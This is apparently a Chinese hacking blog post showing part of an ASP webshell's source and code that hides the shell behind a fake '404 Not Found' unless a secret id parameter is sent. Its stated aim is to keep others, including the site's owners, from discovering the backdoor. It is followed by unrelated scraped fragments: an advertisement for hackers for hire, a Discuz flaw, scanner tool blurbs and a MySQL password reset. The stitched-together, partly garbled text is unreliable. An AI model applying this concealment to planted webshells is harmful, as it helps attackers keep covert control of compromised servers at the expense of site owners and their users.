我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了
或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列 *** 来进行处理。
如何加上密码让他人进不来呢?
有些人直接加个登陆界面,人家一看就知道这是大马,还可以猜密码,我的 *** 就与众不同
首先我们来看看他的一部分源码
<%
'pue=true
On Error Resume Next
server.scripttimeout=600
UserPass="login"
response.buffer = true
Response.Expires = -1
Session.Timeout=60
Const wwj="NET WORK SYSTEM"
Const jlt="WEB TESTER'S SYSTEM"
Const oqk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf"
Const pnf=true
Const rfd=33
Const yqo="d *** fk"
Const kuf="GB2312"
Const gco="_"
Const fgb="want_pre.asp"
Const righthz="_request_send_sumbit_include_reel_open_form_month_data"
public br,pbwell,juppath,foldermax,maxpath
foldermax=0
dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz
jki= Clng("&H0")
for i=0 to 12
cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&","
jki=jki+1118481
next
colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000"
cl=split(colors,",")
怎样进行处理呢?
我在前面加上了
<%
if request("id")="08sec" then
session("ISUSER00")= "TRUE"
end if
%>
<%
If Session("ISUSER00") = "" Then
response.write("<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>")
Response.End
end if
%>
这段代码的意思是
如果返回的id是08sec的话就添加一个session isuser00的值为true
如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found
如果不是就执行下面的代码
所以我们的大马就被保护起来了
效果如下:
一、技术什么工作怎么找黑客 1、黑客接单例如,过去,它包括使用机器代码编程,并知道它最近包括HTML语言。技术什么工作防攻击20世纪80年代中期出现了第四代黑客.先办后付的qq黑客可以模仿攻击的加入滴...
在完成任务时(home.php?mod=draw&do=view&id=xx),任务先前的状态缺少判断 完成任务的链接形如: home.php?mod=draw&...
什么叫Grendel Scan? 我们不彻底明确该新项目是不是依然适用,但我们知道的是,依然可以下载的版本号容许对Web程序运行开展全自动安全性扫描仪。Grendel-Scan的很多作用也可用以手动...
什么是Acunetix WVS? Acunetix是一个Web漏洞检测程序流程,可全自动查验Web程序运行的系统漏洞,比如跨网站脚本制作,SQL引入,身份认证网页页面上的明文密码抗压强度和随意文件创...
Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...
引言:在linux系统中,如果忘记了MySQL的root密码,有没有办法重新设置新密码呢? 答案是肯定的,下面教大家一个比较简单的重置MySQL root密码的办法: 1、编辑MySQ...